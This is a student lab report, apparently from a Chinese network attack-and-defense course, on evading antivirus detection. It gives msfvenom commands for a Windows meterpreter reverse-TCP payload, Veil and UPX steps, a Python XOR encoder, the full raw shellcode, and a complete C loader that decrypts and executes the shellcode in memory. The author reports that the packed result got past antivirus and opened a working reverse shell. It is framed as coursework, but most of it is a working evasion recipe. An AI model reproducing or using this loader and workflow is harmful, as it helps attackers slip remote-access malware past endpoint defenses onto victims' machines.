20232403 2025-2026-1 《网络与系统攻防技术》实验三实验报告
1.实验内容
根据本周所学回答问题:
(1)杀软是如何检测出恶意代码的?
杀软检测恶意代码的核心逻辑是通过 “识别恶意特征或行为”,将恶意代码的特征值储存到资源库,分析目标文件特征并于库比对来检测恶意代码。
(2)免杀是做什么?
是通过各种各样的技术手段修改恶意代码的特征或行为,使其能够绕过杀软的检测机制,在目标系统中正常运行,不被拦截。
(3)免杀的基本方法有哪些?
编码与多层编码、加壳保护、添加花代码混淆特征值等
2.实验过程
2.1正确使用msf编码器,veil-evasion,利用shellcode编程等免杀工具或技巧
2.1.1使用msfvenom生成原始exe文件,使用编码器进行单次编码,并另对其多重编码以提高免杀率
原始exe文件查杀率为59/72=82%,可见原始文件几乎不能做到免杀。
单次编码文件查杀率为57/71=80%。
多次编码文件查杀率为59/71=82%。
可以看到,单次编码和多次编码对免杀几乎都没有起到效果。这是因为,MSF编码器在给文件编码的同时,会在payload前添加一个解码存根,而这个解码存根本身是有固定特征,杀软很容易识别。这使得无论编码多少次,杀软只需识别这个固定的解码存根就能检测文件。
使用msfvenom生成其他格式文件
jar文件查杀率为35/64=55%。
python文件查杀率为21/63=33%。
为什么jar和python文件查杀率更低?这是因为java、python等都不是Windows的“原生格式”,换句话说,jar脚本和python文件需要目标安装java和python,这对杀软资源提出更高要求,使得查杀率降低。
2.1.2使用veil-evasion生成payload
进入veil
进入evasion
查看payload生成器
这里选择的是编号7的c/meterpreter/rev_tcp.py模块,这是一个利用C语言生成的的反向TCP连接payload
生成完成后进行评价
查杀率为39/72=54%。
可见,利用veil也能够起到免杀的作用。
2.1.3使用加壳工具
在kali虚拟机安装upx,使用upx对2.1.2生成的payload文件进行加壳处理。
测评结果
查杀率为37/72=52%。
提升效果并不明显,说明该工具的特征已被记录在库中。
2.1.4使用C + shellcode编程
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.5 LPORT=4444 -f c
生成一段适用于Windows系统的恶意代码,并以C语言数组的形式输出。
根据输出结果创建一个C语言文件20232403.c。
利用i686-w64-mingw32-g++ 20232403.c -o 20232403.exe,将20232403.c编译为20232403.exe文件,并进行评测
查杀率为33/71=44%,免杀效果还是很好的。
2.2通过组合应用各种技术实现恶意代码免杀
2.2.1生成原始shellcode并加密
这里的加密方式是异或加密。
点击查看代码
shellcode = (b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"b"\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f\xb7\x4a\x26\x8b"b"\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"b"\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x01\xd0"b"\x57\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b"b"\x58\x20\x01\xd3\x50\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34"b"\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"b"\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01"b"\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01"b"\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58"b"\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00"b"\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x05\x03\x68\x02\x00"b"\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"b"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74"b"\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"b"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"b"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"b"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"b"\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b"b"\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e"b"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"b"\x00\x53\xff\xd5"
)# 加密密钥
key = 0x55# 异或加密
encrypted_shellcode = [byte ^ key for byte in shellcode]# 输出加密后的shellcode
print("unsigned char enc_shellcode[] = {")for i in range(0, len(encrypted_shellcode), 10):line = encrypted_shellcode[i:i+10]print(" " + ", ".join(f"0x{byte:02x}" for byte in line) + ("," if i+10 < len(encrypted_shellcode) else ""))
print("};")
print(f"unsigned int enc_len = {len(encrypted_shellcode)};")运行python脚本,生成加密shellcode数据
2.2.2根据加密shellcode数据创建解密并加载shellcode的C程序
点击查看代码
#include <windows.h>unsigned char enc_shellcode[] = {0xa9, 0xbd, 0xda, 0x55, 0x55, 0x55, 0x35, 0xdc, 0xb0, 0x64,0x87, 0x31, 0xde, 0x07, 0x65, 0xde, 0x07, 0x59, 0xde, 0x07,0x41, 0x64, 0xaa, 0x5a, 0xe2, 0x1f, 0x73, 0xde, 0x27, 0x7d,0x64, 0x95, 0xf9, 0x69, 0x34, 0x29, 0x57, 0x79, 0x75, 0x94,0x9a, 0x58, 0x54, 0x92, 0x1c, 0x20, 0xba, 0x07, 0xde, 0x07,0x45, 0xde, 0x17, 0x69, 0x54, 0x85, 0x02, 0xde, 0x15, 0x2d,0xd0, 0x95, 0x21, 0x19, 0x54, 0x85, 0xde, 0x1d, 0x4d, 0xde,0x0d, 0x75, 0x54, 0x86, 0x05, 0xd0, 0x9c, 0x21, 0x69, 0x1c,0x64, 0xaa, 0xde, 0x61, 0xde, 0x54, 0x83, 0x64, 0x95, 0xf9,0x94, 0x9a, 0x58, 0x54, 0x92, 0x6d, 0xb5, 0x20, 0xa1, 0x56,0x28, 0xad, 0x6e, 0x28, 0x71, 0x20, 0xb5, 0x0d, 0xde, 0x0d,0x71, 0x54, 0x86, 0x33, 0xde, 0x59, 0x1e, 0xde, 0x0d, 0x49,0x54, 0x86, 0xde, 0x51, 0xde, 0x54, 0x85, 0xdc, 0x11, 0x71,0x71, 0x0e, 0x0e, 0x34, 0x0c, 0x0f, 0x04, 0xaa, 0xb5, 0x0d,0x0a, 0x0f, 0xde, 0x47, 0xbc, 0xd5, 0xaa, 0xaa, 0xaa, 0x08,0x3d, 0x66, 0x67, 0x55, 0x55, 0x3d, 0x22, 0x26, 0x67, 0x0a,0x01, 0x3d, 0x19, 0x22, 0x73, 0x52, 0xdc, 0xbd, 0xaa, 0x85,0xed, 0xc5, 0x54, 0x55, 0x55, 0x7c, 0x91, 0x01, 0x05, 0x3d,0x7c, 0xd5, 0x3e, 0x55, 0xaa, 0x80, 0x3f, 0x5f, 0x3d, 0x95,0xfd, 0x50, 0x56, 0x3d, 0x57, 0x55, 0x44, 0x09, 0xdc, 0xb3,0x05, 0x05, 0x05, 0x05, 0x15, 0x05, 0x15, 0x05, 0x3d, 0xbf,0x5a, 0x8a, 0xb5, 0xaa, 0x80, 0xc2, 0x3f, 0x45, 0x03, 0x02,0x3d, 0xcc, 0xf0, 0x21, 0x34, 0xaa, 0x80, 0xd0, 0x95, 0x21,0x5f, 0xaa, 0x1b, 0x5d, 0x20, 0xb9, 0xbd, 0x32, 0x55, 0x55,0x55, 0x3f, 0x55, 0x3f, 0x51, 0x03, 0x02, 0x3d, 0x57, 0x8c,0x9d, 0x0a, 0xaa, 0x80, 0xd6, 0xad, 0x55, 0x2b, 0x63, 0xde,0x63, 0x3f, 0x15, 0x3d, 0x55, 0x45, 0x55, 0x55, 0x03, 0x3f,0x55, 0x3d, 0x0d, 0xf1, 0x06, 0xb0, 0xaa, 0x80, 0xc6, 0x06,0x3f, 0x55, 0x03, 0x06, 0x02, 0x3d, 0x57, 0x8c, 0x9d, 0x0a,0xaa, 0x80, 0xd6, 0xad, 0x55, 0x28, 0x7d, 0x0d, 0x3d, 0x55,0x15, 0x55, 0x55, 0x3f, 0x55, 0x05, 0x3d, 0x5e, 0x7a, 0x5a,0x65, 0xaa, 0x80, 0x02, 0x3d, 0x20, 0x3b, 0x18, 0x34, 0xaa,0x80, 0x0b, 0x0b, 0xaa, 0x59, 0x71, 0x5a, 0xd0, 0x25, 0xaa,0xaa, 0xaa, 0xbc, 0xce, 0xaa, 0xaa, 0xaa, 0x54, 0x96, 0x7c,0x93, 0x20, 0x94, 0x96, 0xee, 0xa5, 0xe0, 0xf7, 0x03, 0x3f,0x55, 0x06, 0xaa, 0x80
};
unsigned int enc_len = 354;int main() {// 1. 分配内存存储解密后的shellcodeunsigned char* dec_shellcode = (unsigned char*)LocalAlloc(LPTR, enc_len);// 2. 解密for (int i = 0; i < enc_len; i++) {dec_shellcode[i] = enc_shellcode[i] ^ 0x55;}// 3. 分配可执行内存,写入解密后的shellcode并执行void* mem = VirtualAlloc(NULL, enc_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);RtlMoveMemory(mem, dec_shellcode, enc_len); ((void(*)())mem)(); // 执行shellcodeLocalFree(dec_shellcode);VirtualFree(mem, 0, MEM_RELEASE);return 0;
}
2.2.3用mingw编译,减少程序特征:i686-w64-mingw32-gcc loader.c -o malicious.exe -s
2.2.4用UPX对malicious.exe加壳:upx malicious.exe -o malicious_packed.exe
2.2.4免杀测试
malicious_packed.exe放在windows系统D盘下
杀毒软件扫描结果:
成功与杀毒软件共生
2.3用另一电脑实测,在杀软开启的情况下,可运行并回连成功
回连成功
3.问题及解决方案
-
问题1:做到最后一步无法获取目标机的shell
-
问题1解决方案:从头开始一个一个参数排查,发现一开始生成原始文件的时候,参数写成了目标机的的ip,然后重做了一遍实验。。。太悲伤了!
4.学习感悟、思考等
一是学到了很多免杀的手段,意识到即使有杀毒软件电脑也不是绝对安全的,需要增强防范意识。二是以后做事一定要更细心一点,不能再犯这次实验的低级错误。
)
)
![window[-TEXT-] 有哪些属性和方法?](http://pic.xiahunao.cn/window[-TEXT-] 有哪些属性和方法?)
![洛谷 P6965 [NEERC 2016] Binary Code /「雅礼集训 2017 Day4」编码 【经验值记录】(2-SAT 学习笔记)](http://pic.xiahunao.cn/洛谷 P6965 [NEERC 2016] Binary Code /「雅礼集训 2017 Day4」编码 【经验值记录】(2-SAT 学习笔记))
